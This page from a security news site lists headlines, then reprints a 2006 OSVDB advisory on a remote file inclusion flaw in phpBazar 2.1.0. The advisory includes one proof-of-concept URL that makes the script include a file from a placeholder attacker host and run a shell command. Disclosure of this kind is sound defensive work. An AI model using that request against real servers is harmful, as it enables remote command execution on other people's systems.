HNS MAIN FEED
Thursday, 19:12 EDT
- Android wallpaper app stealing user data and sending it to China
- Black Hat USA 2010: A recession proof conference?
- Apple improves App Store security
- ATMs hacked and spitting up money at Black Hat
- Trojan masquerades as iPhone jailbreaking software
- Authentication management platform for any and every authentication factor
- Google has two times more malware than Bing, Yahoo! and Twitter combined
- New assurance mark of software application security
- Sourcefire's open source framework for deep threat inspection
- 100 million Facebook pages published on torrent site
- Cell-phone call interception demonstration at Defcon might not be a sure thing
- Critical ToolTalk Database Server Parser vulnerability discovered
phpBazar classified_right.php language_dir Variable Remote File Inclusion
Posted on 22 May 2006
Vulnerability Description
phpBazar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to classified_right.php not properly sanitizing user input supplied to the 'language_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Manual Testing Notes
/classified_right.php?language_dir=http://[attacker]/cmd.gif?cmd=ls
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Products:
- SmartISoft phpBazar 2.1.0 Affected
Vulnerability classification:
- Remote vulnerability
- Input manipulation attack
- Impact on integrity
- Exploit available
External references:
- Vendor URL: go there
- Secunia Advisory ID: 20198
- Mail List Post: go there
- Related OSVDB ID: 25701
- FrSIRT Advisory: ADV-2006-1890
- Bugtraq ID: 18052
The HNS Vulnerabilities section is powered by OSVDB